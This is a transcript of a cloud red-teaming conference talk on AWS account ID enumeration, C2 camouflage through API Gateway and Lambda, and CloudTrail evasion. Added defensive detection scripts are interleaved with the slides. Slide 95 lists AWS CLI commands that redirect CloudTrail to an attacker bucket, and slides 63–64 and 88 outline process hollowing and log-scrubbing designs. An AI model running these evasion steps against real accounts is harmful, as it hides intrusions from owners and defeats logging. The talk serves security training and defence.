
Serverless and Dys-FUNctional Cloud Red Teaming

TweekFawkes
October 27, 2020

Serverless and Dys-FUNctional Cloud Red Teaming

Research on Serverless and Dys-FUNctional Cloud Red Teaming presented at SaintCon in Utah on October 27th 2020.

Serverless Compute Technologies (e.g. AWS Lambda, Azure Functions, GCP Cloud Functions, etc.) enable the rapid development of applications and APIs which can scale to epic proportions at minimal cost. In this session, we will cover how to quickly develop serverless applications (e.g. with AWS SAM) for the purposes of significantly improving and automating typical Red Teaming operations, including:

- Discovering semi-sensitive information (e.g. AWS Account IDs) via analyzing responses from various Cloud services.

- Elegantly Redirecting a Red Team’s Command & Control (C2) through Cloud services (e.g. AWS API Gateway & Lambda, Azure Functions, etc.) to camouflage C2.

- Disrupting Logging Services (e.g. AWS CloudTrail) with Serverless applications (e.g. Lambda) to remain undetected within compromised AWS environments.



Transcript

  1. Version 0.0.1
    Copyright 2020 by Stage 2 Security
    Serverless & Dys-FUNctional Cloud Red Teaming (AWS, Azure, GCP, etc...)

  2. Introduction

  3. About Me
    Bryce Kunz (@TweekFawkes)
    - Defense: DHS SOC
    - Offense: NSA
    - Red Team: Adobe DX

  4. (image-only slide)

  5. (image-only slide)

  6. Special Thanks!
    - Michael Butler, VP of Services & Pentest Lead
    - Waylon Grange (@Professor__Plum), Research Lead & Creator of .
    - Scott Pack, Cloud Security Architect at Adobe

  7. Overview

  8. Agenda
    Overview of Serverless Technologies, Services, & Frameworks
    - API Gateway, Lambda, CloudFormation, etc.
    - Zappa, AWS Serverless Application Model (SAM), etc.
    Use Cases Applicable for Red Teamers, Penetration Testers, etc.
    - AWS Account ID Discovery
    - Command & Control through AWS Services
    - Leveraging Lambda to Disrupt AWS Logging Services

  9. AWS Services

  10. API Gateway
    API Proxy (HTTP or REST) as a managed service
    https://aws.amazon.com/api-gateway/

  11. API Gateway Overview
    API Gateway is a managed service that creates APIs at scale
    ● An API that acts as a “front door” for applications to access data, business logic, or functionality from your back-end services,
      ○ such as code running on AWS Lambda, or any web application.
    API Gateway can be considered a backplane in the cloud to connect AWS services and other public or private websites.
    Provides consistent RESTful application programming interfaces (APIs) for web applications to access AWS services.

  12. API Gateway Types
    HTTP APIs are designed for low-latency, cost-effective integrations with AWS services (e.g. Lambda) and HTTP endpoints.
    REST APIs currently offer more features, and full control over API requests and responses.
    https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html

  13. Lambda
    AWS Scripts as a managed service
    https://aws.amazon.com/lambda/

  14. Lambda Overview
    AWS Lambda is a serverless compute service
    ● Runs your code in response to events and automatically manages the underlying compute resources for you.
    ● Lambda can automatically run code in response to multiple events, such as:
      ○ HTTP requests via Amazon API Gateway,
      ○ PutObject calls to Amazon S3 Buckets,
      ○ Table updates in Amazon DynamoDB, and
      ○ State transitions in AWS Step Functions.
    ● You can use AWS Lambda to extend other AWS services with custom logic

  15. Lambda Runtimes & Environment
    ● Supports many native runtimes
      ○ Python 2.7 & 3, Java, Ruby, Go, C# +
    ● AWS SDKs built in (e.g. boto3)
    ● Role Credentials placed in Environment Variables
    ● Max 15 Minute Runtime

  16. Lambda Common Web App Architecture
    (architecture diagram)
    https://aws.amazon.com/lambda/

  17. CloudFormation
    Amazon Services Setup
    https://aws.amazon.com/cloudformation/

  18. Administration
    (Diagram: Cloud Admin (Dave) uses the Management UI, which calls the Control Plane (APIs); the Data Plane sits beneath it)

  19. CloudFormation Overview
    (Diagram: same Control Plane (APIs) / Data Plane layout, with Cloud Automation driving the Control Plane alongside the Management UI)
    Cloud Automation
    - CloudFormation
    - Terraform
    - Salt Cloud
    - Custom Scripts

  20. Setup Resources
    (Diagram: Cloud Admin -> Management UI -> Control Plane (APIs))

  21. Application
    (Diagram: Cloud Admin -> Management UI -> Control Plane (APIs))

  22. Services
    (Diagram: Control Plane (APIs) provisioning Storage, VM, App and LB)

  23. Cloud-Aware Application
    (Diagram: Cloud Admin (Dave) and Ext Cloud Automation (Terraform, Salt Cloud, Custom) drive the Control Plane (APIs), which manages Storage, VM, App and LB)

  24. Open for Business
    (Diagram: as slide 23, with USERS now reaching the application)

  25. Serverless Frameworks

  26. Zappa
    $ pip install zappa
    $ zappa init
    $ zappa deploy
    Zappa makes it super easy to build and deploy serverless, event-driven Python applications (including, but not limited to, WSGI web apps) on AWS Lambda + API Gateway (via CloudFormation).
    https://github.com/Miserlou/Zappa

  27. AWS Serverless Application Model (SAM)
    https://aws.amazon.com/serverless/build-a-web-app/

  28. AWS Serverless Application Model (SAM)
    Infrastructure as Code
    Based on CloudFormation, but much simpler to implement common Serverless Application Models...
    https://aws.amazon.com/serverless/sam/

  29. AWS Serverless Application Model (SAM)
    The Serverless Application Model is commonly referred to as “SAM” in AWS documentation
    SAM is NOT an AWS Service, it’s more similar to Zappa or Terraform
    New Resource Types with SAM:
    ● AWS::Serverless::Function -> AWS Lambda Functions
    ● AWS::Serverless::Api -> AWS API Gateway APIs
    ● AWS::Serverless::SimpleTable -> AWS DynamoDB Tables
    https://aws.amazon.com/serverless/sam/

  30. Use Cases

  31. Use Case #1: Discover Account IDs
    Discovering semi-sensitive information (e.g. AWS Account IDs) via analyzing responses from various Cloud services.

  32. AWS Account IDs
    Every AWS account is given a unique ID
    Account IDs are 12 digit numbers, e.g. 885264802853
    Semi-Sensitive?
    Usually kept private...
    But historically, considered to be equivalent to a username disclosure

  33. AWS Account IDs - The Math
    Account IDs are 12 digit numbers
    ● e.g. 885264802853
    10 possible digits (0,1,2,3,4,5,6,7,8,9)
    ● 12 digits long
    10^12 means...
    ● 1 Trillion! Possible Account IDs

  34. AWS Account IDs - Should They be Protected?
    Many vendors share their Account IDs, to enable clients to use their services:
    https://github.com/duo-labs/cloudmapper/blob/main/vendor_accounts.yaml
    Should They be Protected?
    Tech industry is saying… NO
    Including, but not limited to:
    ● Rackspace
    ● TrendMicro
    ● Redlock
    ● Sumo Logic
    ● Bridgecrew
    ● Onelogin
    ● Rapid7
    ● Threat Stack
    ● Lucidchart
    ● Palo Alto Networks
    ● Tenable
    etc...

  35. Known Attacks via Knowing Account IDs
    AWS error messages disclose whether a role exists or not, w/ a given Account ID
    Role Names can disclose:
    ● AWS Services being used
    ● Software & Technologies being used
    ● Names of IAM users (social engineering)
    ● 3rd party integrations being used (Okta, Datadog, Cloudsploit, etc.)
    Once roles are enumerated, one can try to assume any open roles and pilfer the role credentials.
    Same attack vector applies for IAM Usernames
    https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/
    https://rhinosecuritylabs.com/aws/aws-iam-user-enumeration/
    https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_iam_principals.py

  36. Other Attacks via Knowing Account IDs
    Areas for Future Research:
    ● Discovering overly privileged topics and/or queues with guessable names
    This is the way!
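Slides 34 and 36 together suggest a defender-side check: the account IDs that vendors publish (plus your own accounts) are the only principals a topic or queue policy should ever name, so anything else in an Allow statement, and any wildcard principal, deserves a look. The audit below is an added example, not code from the talk or from the CaptureTheCloud repository; the allowlist, the queue policy and every account ID in it are constructed for the example, and `KNOWN_ACCOUNTS` stands in for a file like cloudmapper's vendor_accounts.yaml merged with your own account list.

```python
import json
import re
from typing import Dict, List

# Constructed allowlist: our own accounts plus third parties we knowingly integrate with,
# in the spirit of cloudmapper's vendor_accounts.yaml. The IDs are made up for the example.
KNOWN_ACCOUNTS: Dict[str, str] = {
    "111111111111": "our-production",
    "222222222222": "our-security-tooling",
    "333333333333": "example-vendor (hypothetical)",
}

ACCOUNT_ID_RE = re.compile(r"\b(\d{12})\b")


def principal_account_ids(principal) -> List[str]:
    """Return the account IDs named by a policy Principal element, or "*" for a wildcard.
    Handles the shapes IAM accepts: "*", {"AWS": "*"}, {"AWS": "<arn>"} and {"AWS": [<arn>, ...]}."""
    if principal == "*":
        return ["*"]
    if not isinstance(principal, dict):
        return []
    values = principal.get("AWS", [])
    if isinstance(values, str):
        values = [values]
    ids = []
    for value in values:
        if value == "*":
            ids.append("*")
        else:
            match = ACCOUNT_ID_RE.search(value)
            ids.append(match.group(1) if match else value)
    return ids


def audit_resource_policy(policy_json: str) -> List[str]:
    """One finding per Allow statement that opens the resource to a wildcard
    principal or to an account that is not in KNOWN_ACCOUNTS."""
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", "<no Sid>")
        for account in principal_account_ids(stmt.get("Principal", {})):
            if account == "*":
                scope = "scoped by a Condition, review it" if stmt.get("Condition") else "no Condition, public"
                findings.append(f"{sid}: Allow to wildcard principal ({scope})")
            elif account not in KNOWN_ACCOUNTS:
                findings.append(f"{sid}: Allow to unknown account {account}")
    return findings


# Constructed SQS queue policy with one vendor grant, one public grant and one unknown account.
SAMPLE_QUEUE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "VendorSend", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::333333333333:root"},
         "Action": "sqs:SendMessage",
         "Resource": "arn:aws:sqs:us-east-1:111111111111:orders"},
        {"Sid": "AnyoneSend", "Effect": "Allow",
         "Principal": "*",
         "Action": "sqs:SendMessage",
         "Resource": "arn:aws:sqs:us-east-1:111111111111:orders"},
        {"Sid": "Mystery", "Effect": "Allow",
         "Principal": {"AWS": ["arn:aws:iam::444444444444:root",
                               "arn:aws:iam::111111111111:role/order-worker"]},
         "Action": "sqs:*",
         "Resource": "arn:aws:sqs:us-east-1:111111111111:orders"},
    ],
})

if __name__ == "__main__":
    for finding in audit_resource_policy(SAMPLE_QUEUE_POLICY):
        print(finding)
```

Run over the sample policy it reports the public statement and the unknown account, and stays quiet about the vendor grant. The same walk applies to SNS topic, S3 bucket and KMS key policies, since all share the Principal element; a wildcard principal that carries a Condition (for example an aws:SourceArn check) is flagged for review rather than as public, because that is the legitimate pattern for service-to-service grants.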

  37. Known Ways to Discover Account IDs
    Including, but not limited to:
    ● Compromise a resource (e.g. Lambda, etc.)
    ● Public resources (e.g. Snapshots, AMI, etc.)
    ● Source Code Review (e.g. GitHub)
    ● Error Messages from Services
    ● Screenshots and/or Documentation
    ● Forums and/or Discussion Boards
    ● etc.

  38. Known Ways to Discover Account IDs
    https://github.com/dagrz/aws_pwn/blob/master/miscellanea/Kiwicon%202016%20-%20Hacking%20AWS%20End%20to%20End.pdf
    By default, the login URL for the web console includes the Account ID as a subdomain.
    The subdomain returns different HTTP response codes depending on whether a login page exists.
    NOTE: The URL can be changed by the owner of the AWS account, and this is done somewhat frequently.

  39. Known Ways to Discover Account IDs
    https://github.com/dagrz/aws_pwn/blob/master/miscellanea/Kiwicon%202016%20-%20Hacking%20AWS%20End%20to%20End.pdf
    VirusTotal Results: (screenshot)

  40. Known Ways to Discover Account IDs
    https://github.com/Stage2Sec/CaptureTheCloud/blob/master/find_aws_account_ids_virustotal.py
    VirusTotal has since updated the API to v2, which requires a slightly different syntax to query

  41. Other Ways to Discover Account IDs
    Other OSINT Sources:
    ● PassiveTotal <- This works better for us than VirusTotal
    ● Amass <- Always awesome
    ● etc.

  42. Leverage SAM to Create...
    SAM:
    ● template.yaml
    ● app.py
    ● etc.

  43. SAM Template
    SAM Template:
    ● API Gateway
      ○ GET /hello
    ● Lambda
      ○ Python 3.7
    ● Attach Policy to Enable:
      ○ S3 Bucket Access
    ● Set Timeout to Max:
      ○ 15 Minutes (900 Seconds)

  44. Lambda Application
    Python App Source:
    ● Generate an ID (secrets library)
    ● Try w/ Web Console (requests library)
    ● Analyze Response
    ● Write Result to S3

  45. SAM Deploy
    https://aws.amazon.com/blogs/aws/new-aws-toolkits-for-pycharm-intellij-preview-and-visual-studio-code-preview/

  46. Leverage SAM to Create... (diagram)

  47. Finding Accounts
    (Diagram: runs at every 3rd minute (*/3 * * * *), 33x, with a 0-3 second delay, w/ max 15 min; ~40 Account IDs (302s) per hour)

  48. Leverage SAM to Create...
    (same diagram as slide 47)

  49. Another Option: Cron via CloudWatch
    https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/sam-property-function-schedule.html

  50. Correlating Account ID w/ Resources
    S3 feature to validate correct bucket ownership!
    If we know of a publicly available object within an S3 bucket
    e.g. a static resource (image, javascript, etc.) for a public website
    And we think we may know
    We can check to see if an AWS Account ID is associated with it via this API!
    https://aws.amazon.com/about-aws/whats-new/2020/09/amazon-s3-bucket-owner-condition-helps-validate-correct-bucket-ownership/
    https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-owner-condition.html
    https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html

  51. Use Case #2: Serverless C2
    Elegantly Redirecting a Red Team’s Command & Control (C2) through Cloud services (e.g. AWS API Gateway & Lambda, Azure Functions, etc.) to camouflage C2.

  52. Azure: Domain Fronting
    https://truneski.github.io/blog/2019/02/27/empire-domain-fronting-with-microsoft-azure/

  53. Azure: Functions - Serverless Redirection
    https://fortynorthsecurity.com/blog/azure-functions-functional-redirection/
    https://medium.com/@rvrsh3ll/azure-app-services-for-offensive-operations-f1de99a83fa0

  54. AWS: API GW & Lambda - Serverless Redirection
    https://blog.xpnsec.com/aws-lambda-redirector/

  55. Cross Platform Post Exploitation Toolkit

  56. Cross Platform (Linux, macOS, & Windows) Post Exploitation Red Team Toolkit
    Designed for Red Teams operating within the tech sector (macOS laptops w/ Linux production servers):
    ● Initiative Multi-User Collaboration,
    ● OPSEC from the ground up (e.g. Memory Only),
    ● Pivoting (chaining callbacks & listeners),
    ● Scripting (python in memory only),
    ● & more!

  57. Voodoo Overview
    The overview screen provides a quick look at what agents you have and how their comms are being routed. Agents shown in gray are dead agents which have stopped calling in. You can double click on any of the icons to jump right to that agent.

  58. Voodoo Boneyard
    Once an agent is presumed dead you can move it to the boneyard by clicking the X button on the top right of the agent (it is a check mark in the picture to the right). This allows you to keep your agent list less cluttered while still keeping logs of previous activities. If at any time an agent in the boneyard list suddenly comes online it will automatically move back to the agents list.

  59. Voodoo Users
    Voodoo is a multi-operator concurrent system. By creating separate accounts for each of your team members you can log who issued which commands, and each can work independently or collaboratively on the same agents. Two-factor authentication is also available should you require tighter control on access to your operations.

  60. Voodoo Stager (communication options)
    ● Name -- a name for your reference
    ● Communication Style
      ○ HTTPS call-back -- The agent will initiate connections to the Voodoo LP over a specified port to check for tasking
      ○ TLS Call-in -- The agent will listen on a specified port for the Voodoo LP to connect into it and provide tasking
    ● Call-out options
      ○ Domain -- address where the agent calls back
      ○ Port -- port to use (typically 443)
      ○ Interval -- how often to check in
    ● Call-in options
      ○ Port -- port to listen on for inbound connections

  61. Voodoo Stager (target environment options)
    ● Target -- OS family you are targeting
    ● Host Process -- An executable which the agent will be injected into
      ○ This must be a valid executable on the target
    ● Command Argument / Passphrase
      ○ This is the command line argument that will show up in a ps list
      ○ It is also used as a decryption key for the agent's configuration
    ● Update -- Click this button to save your changes

  62. Voodoo Stager (execution options)
    ● Script tabs -- These are a number of different one-liners you can use to execute the agent.
      ○ Each is for a different environment
      ○ On older Linux systems (or targets where SYS_PTRACE is disabled) there is a “No Inject” option
      ○ On Windows there is also a PowerShell option
    ● Download Executable -- Alternatively, you can download an executable, transfer it to the target and run it manually.
      ○ exename targetprocess passphrase

  63. Stagers (under the hood)
    ● The one-liners (stagers) bootstrap Voodoo
      a. Downloads an encoded reflective library
      b. Decodes and loads the library into the current process
      c. Calls a library function with the passphrase and the name of the target process
        ■ The library then starts up the target process
        ■ Hollows out the target process
        ■ Injects Voodoo
        ■ Cleans up any artifacts
      d. Original process then exits

  64. Injection
    ● Voodoo uses a custom shellcode bootstrap that loads a DLL into memory
      ○ Doesn’t touch disk
      ○ Avoids creating RWX memory sections
      ○ Supports C++ exception handling
        ■ Even in injected libraries
      ○ After injection the bootstrap wipes itself from memory

  65. Secure Communication Channels
    ● Although Voodoo uses HTTPS/TLS for C2 communication, it doesn’t rely on it for security
      ○ Many SSL visibility products exist
      ○ What about MitM?
    ● Voodoo uses ChaCha20 and Poly1305 underneath to protect PII of the target
      ○ Less processor intensive than AES, but same level of security
      ○ Uses a one time pad to encrypt data
      ○ More difficult to signature compared to AES
      ○ Each agent is keyed with the public key of the LP, no MitM
      ○ Each agent generates a unique private key
      ○ If one agent were to be compromised, all other agent comms would still be secure.

  66. #0 - Exploit
    (Diagram: Public subnet 10.0.1.0/24 hosting the Web App; Private subnet 10.0.2.0/24)

  67. #1 - Callback
    (Diagram: the Web App in 10.0.1.0/24 calls back to the LP)

  68. #2 - Connect
    (Diagram: adds the Database in the Private subnet 10.0.2.0/24; #1 - Callback, #2 - Connect)

  69. (same diagram as slide 68)

  70. (Diagram: as slide 68, with a Monitoring host added in the Private subnet)

  71. #3 - Connect
    (Diagram: Database and Monitoring in 10.0.2.0/24; #1 - Callback, #2 - Connect, #3 - Connect)

  72. (same diagram as slide 71)

  73. #4 - Connect
    (Diagram: as slide 71, with Secrets! reached via #4 - Connect)

  74. (same diagram as slide 73)

  75. API Gateway

  76. Flow: API Gateway Redirector
    (Diagram)
    Ref: https://aws.amazon.com/blogs/aws/identify-unintended-resource-access-with-aws-identity-and-access-management-iam-access-analyzer/

  77. (same diagram as slide 76)

  78. Flow: API Gateway
    (Diagram: Agent -> HTTPS -> API Gateway -> HTTPS -> LP)
    Ref: https://aws.amazon.com/blogs/aws/identify-unintended-resource-access-with-aws-identity-and-access-management-iam-access-analyzer/

  79. API Gateway & Lambda

  80. Flow: API Gateway & Lambda
    (Diagram: Agent -> HTTPS -> API Gateway -> Lambda (Py Urllib, Base64) -> HTTPS -> LP)
    Ref: https://aws.amazon.com/blogs/aws/identify-unintended-resource-access-with-aws-identity-and-access-management-iam-access-analyzer/

  81. Blog Post: AWS API Gateway fronting for Command and Control
    Ref: https://medium.com/stage-2-security/aws-api-gateway-fronting-for-command-and-control-45d03dffb24e
    Waylon Grange (@Professor__Plum)
    Stage2Sec.com -> “About Us” -> “Blog”
    https://medium.com/stage-2-security
    Content-Type: application/octet-stream
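From the blue-team side, the flow on slides 78 to 81 (agent, HTTPS, API Gateway, Lambda relaying to the LP, opaque octet-stream bodies) leaves a recognisable shape in egress proxy logs: one client talking to one API Gateway hostname on a fixed interval with almost no jitter, with bodies that are never JSON. The detector below is an added example, not code from the talk or from Stage 2 Security; the log format, the hostnames, the client addresses and the thresholds are all assumptions, and the sample lines are constructed. It keys on the default API Gateway hostname form `<api-id>.execute-api.<region>.amazonaws.com`, so an API placed behind a custom domain name will not match and needs a different hunt.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Default API Gateway hostname pattern (<api-id>.execute-api.<region>.amazonaws.com).
# A custom domain name in front of the API will not match this.
APIGW_HOST_RE = re.compile(r"\.execute-api\.[a-z0-9-]+\.amazonaws\.com$")

# Constructed proxy log lines (no real hosts or clients). Assumed format:
# <UTC timestamp> <client ip> <method> <host> <path> <content-type> <bytes>
SAMPLE_PROXY_LOG = """\
2020-10-27T10:00:00Z 10.0.1.25 POST a1b2c3d4e5.execute-api.us-east-1.amazonaws.com /prod/api application/octet-stream 312
2020-10-27T10:00:05Z 10.0.1.40 GET cdn.example.com /app.js text/javascript 88120
2020-10-27T10:00:05Z 10.0.1.40 POST f6g7h8i9j0.execute-api.us-west-2.amazonaws.com /v1/orders application/json 1840
2020-10-27T10:00:07Z 10.0.1.40 GET f6g7h8i9j0.execute-api.us-west-2.amazonaws.com /v1/orders/77 application/json 420
2020-10-27T10:01:00Z 10.0.1.25 POST a1b2c3d4e5.execute-api.us-east-1.amazonaws.com /prod/api application/octet-stream 298
2020-10-27T10:02:00Z 10.0.1.25 POST a1b2c3d4e5.execute-api.us-east-1.amazonaws.com /prod/api application/octet-stream 305
2020-10-27T10:03:00Z 10.0.1.25 POST a1b2c3d4e5.execute-api.us-east-1.amazonaws.com /prod/api application/octet-stream 311
2020-10-27T10:03:30Z 10.0.1.40 GET f6g7h8i9j0.execute-api.us-west-2.amazonaws.com /v1/orders/78 application/json 415
2020-10-27T10:04:00Z 10.0.1.25 POST a1b2c3d4e5.execute-api.us-east-1.amazonaws.com /prod/api application/octet-stream 301
2020-10-27T10:09:00Z 10.0.1.40 GET f6g7h8i9j0.execute-api.us-west-2.amazonaws.com /v1/orders/79 application/json 418
"""


def parse_proxy_log(text: str) -> Dict[Tuple[str, str], List[Tuple[datetime, str]]]:
    """Group requests to API Gateway default hostnames by (client, host)."""
    series: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, host, _path, ctype, _nbytes = line.split()
        if not APIGW_HOST_RE.search(host):
            continue  # only execute-api hosts are of interest here
        series[(client, host)].append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ctype))
    return series


def find_beacons(text: str, min_hits: int = 4, max_jitter: float = 0.2) -> List[dict]:
    """Flag (client, host) pairs whose requests arrive at a near-constant interval
    (coefficient of variation <= max_jitter) and mostly carry opaque bodies."""
    findings = []
    for (client, host), events in parse_proxy_log(text).items():
        if len(events) < min_hits:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean_gap
        opaque = sum(1 for _, c in events if c == "application/octet-stream") / len(events)
        if jitter <= max_jitter and opaque >= 0.5:
            findings.append({"client": client, "host": host, "hits": len(events),
                             "mean_interval_s": round(mean_gap, 1), "jitter": round(jitter, 2)})
    return findings


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_PROXY_LOG):
        print(finding)
```

On the sample log the workstation 10.0.1.25 is reported (five POSTs exactly 60 s apart, all octet-stream) while 10.0.1.40, which also talks to an API Gateway host but irregularly and with JSON bodies, is not. Real agents usually add check-in jitter, so raise `max_jitter` and lengthen the window before relying on the interval test alone; the content-type and single-host conditions carry most of the signal.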

  82. Use Case #3: Lambda Log Disruption
    Disrupting Logging Services (e.g. AWS CloudTrail) with Serverless applications (e.g. Lambda) to remain undetected within compromised AWS environments.

  83. AWS: Logging Overview

  84. CloudTrail - Control Plane (e.g. API) Logging
    CloudTrail provides event history of your AWS account activity, including actions taken through the:
    ● AWS Management Console,
    ● AWS SDKs,
    ● command line tools,
    ● and other AWS services.
    This event history simplifies security analysis, resource change tracking, troubleshooting and Incident Response (IR).

  85. Data Plane
    (Diagram: Control Plane (APIs) above the Data Plane; Cloud Admin via the Management UI and Ext Cloud Automation (Terraform, Salt Cloud, Custom) act on the Control Plane; USERS act on the Data Plane)

  86. Logging Disruption via Lambda! (Overview)

  87. CloudTrail Logging
    (Diagram: VPC 10.0.0.0/16 with Public 10.0.1.0/24 and Private 10.0.2.0/24 subnets; SSH into 10.0.1.x and 10.0.2.x; Control Plane activity logged by CloudTrail into an S3 Bucket)
    CloudTrail provides event history of your AWS account activity, including actions taken through the:
    ● AWS Management Console,
    ● AWS SDKs,
    ● command line tools,
    ● and other AWS services.
    This event history simplifies security analysis, resource change tracking, and troubleshooting.

  88. CloudTrail Logging Disruption
    (Diagram: same VPC layout as slide 87)
    - S3 Write Triggers a Lambda function
    - Lambda function scrubs logs of
      ● Attacker’s Actions
      ● Attacker’s IP Addresses
    - Ideally, other logging systems collect the cleaned log files from S3

  89. AWS: Buffering Dominos (Overview)

  90. CloudTrail
    (Diagram: Users -> Internet -> CloudTrail -> CloudTrail S3 Bucket)

  91. CloudTrail: Buffering
    (Diagram: as slide 90, with a Buffer between CloudTrail and the CloudTrail S3 Bucket)

  92. CloudTrail: Suspicious Notable
    (Diagram: a Suspicious? event sits in the Buffer ahead of the CloudTrail S3 Bucket)

  93. CloudTrail: DeleteTrail
    (Diagram: DeleteTrail calls pass through the Buffer into the CloudTrail S3 Bucket: Detected!)

  94. CloudTrail: Delete & Create w/ Attacker Bucket
    (Diagram: DeleteTrail, then CreateTrail pointing CloudTrail at a second S3 Bucket, with the DeleteTrail events still in the Buffer)

  95. CloudTrail: Delete & Create w/ Attacker Bucket
    aws sts get-caller-identity --profile target
    aws cloudtrail describe-trails --profile target
    … redteam017s3bucket001 ...
    aws cloudtrail delete-trail --name "redteam017trail001" --profile target
    aws cloudtrail create-trail --name "redteam017trail001" --s3-bucket-name "redteam017s3bucket101" \
        --is-multi-region-trail --profile target
    aws cloudtrail start-logging --name "redteam017trail001" --profile target
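Slides 88 and 93 to 95 describe two ways the trail can be turned against its owner: a Lambda trigger on the CloudTrail bucket that rewrites log files as they land, and a delete-then-create of the same trail that points it at a bucket the account owner does not control. Both leave control-plane events behind, and the delete/create pair is itself the signature. The detector below is an added example, not code from the talk or from Stage 2 Security; it reads CloudTrail records in the documented record layout (eventTime, eventSource, eventName, requestParameters, userIdentity, sourceIPAddress), but every value, the approved-bucket list and the trail and bucket names (taken from the CLI sequence on slide 95) are constructed for the example.

```python
import json
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed allowlist: the only buckets our trails are allowed to deliver to.
APPROVED_TRAIL_BUCKETS = {"corp-cloudtrail-logs"}

# Constructed CloudTrail records modelled on the CLI sequence on slide 95.
# Field names follow the CloudTrail record format; the values are made up.
SAMPLE_CLOUDTRAIL_RECORDS = json.dumps({"Records": [
    {"eventTime": "2020-10-27T14:00:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DescribeTrails", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dave"}, "requestParameters": None},
    {"eventTime": "2020-10-27T14:00:30Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DeleteTrail", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dave"},
     "requestParameters": {"name": "redteam017trail001"}},
    {"eventTime": "2020-10-27T14:00:45Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "CreateTrail", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dave"},
     "requestParameters": {"name": "redteam017trail001", "s3BucketName": "redteam017s3bucket101",
                           "isMultiRegionTrail": True}},
    {"eventTime": "2020-10-27T14:01:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StartLogging", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dave"},
     "requestParameters": {"name": "redteam017trail001"}},
    {"eventTime": "2020-10-27T14:05:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutBucketNotification", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dave"},
     "requestParameters": {"bucketName": "corp-cloudtrail-logs"}},
]})


def _when(rec: dict) -> datetime:
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def detect_trail_tampering(records_json: str,
                           recreate_window: timedelta = timedelta(minutes=5)) -> List[str]:
    """Return one finding per event that stops, redirects or hooks CloudTrail delivery."""
    records = sorted(json.loads(records_json)["Records"], key=_when)
    findings: List[str] = []
    deleted_at: Dict[str, datetime] = {}  # trail name -> time of its latest DeleteTrail
    for rec in records:
        name = rec["eventName"]
        params = rec.get("requestParameters") or {}
        who = rec.get("userIdentity", {}).get("arn", "?")
        src = rec.get("sourceIPAddress", "?")
        stamp = rec["eventTime"]
        if rec["eventSource"] == "cloudtrail.amazonaws.com":
            trail = params.get("name", "?")
            if name in ("DeleteTrail", "StopLogging"):
                if name == "DeleteTrail":
                    deleted_at[trail] = _when(rec)
                findings.append(f"{stamp} {name} on {trail} by {who} from {src}")
            elif name in ("CreateTrail", "UpdateTrail"):
                bucket = params.get("s3BucketName")
                if bucket and bucket not in APPROVED_TRAIL_BUCKETS:
                    msg = f"{stamp} {name} points {trail} at unapproved bucket {bucket} by {who} from {src}"
                    gap = _when(rec) - deleted_at[trail] if trail in deleted_at else None
                    if gap is not None and gap <= recreate_window:
                        # delete followed by create of the same trail: the slide 94/95 pattern
                        msg += f" (re-created {int(gap.total_seconds())}s after DeleteTrail: log-redirection pattern)"
                    findings.append(msg)
        elif (rec["eventSource"] == "s3.amazonaws.com" and name == "PutBucketNotification"
              and params.get("bucketName") in APPROVED_TRAIL_BUCKETS):
            # a new event notification on the log bucket is how a scrubbing Lambda gets wired in (slide 88)
            findings.append(f"{stamp} {name} changed event notifications on CloudTrail bucket "
                            f"{params['bucketName']} by {who} from {src} (possible log-scrubbing trigger)")
    return findings


if __name__ == "__main__":
    for finding in detect_trail_tampering(SAMPLE_CLOUDTRAIL_RECORDS):
        print(finding)
```

The three findings on the sample are the DeleteTrail, the CreateTrail re-pointing the same trail name at an unapproved bucket 15 s later, and the notification change on the real log bucket. Because the events that matter are the ones an attacker wants to suppress, this logic belongs on a path that does not depend on the bucket being protected: a CloudWatch Events / EventBridge rule on the CloudTrail and S3 APIs, or an organization trail delivered to a separate log-archive account, rather than a job that reads the same S3 bucket the Lambda in slide 88 is rewriting.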

  96. Blog: AWS CloudTrail Logging Logic Flaw
    Ref: https://medium.com/stage-2-security/aws-api-gateway-fronting-for-command-and-control-45d03dffb24e
    Bryce Kunz (@TweekFawkes)
    Stage2Sec.com -> “About Us” -> “Blog”
    https://medium.com/stage-2-security

  97. Conclusion

  98. Thank You!
    Bryce Kunz (@TweekFawkes) [email protected]
    Trainings: Hands-On Cloud Red Teaming
    Code: Github.com/Stage2Sec/CaptureTheCloud
    Slides: SpeakerDeck.com/TweekFawkes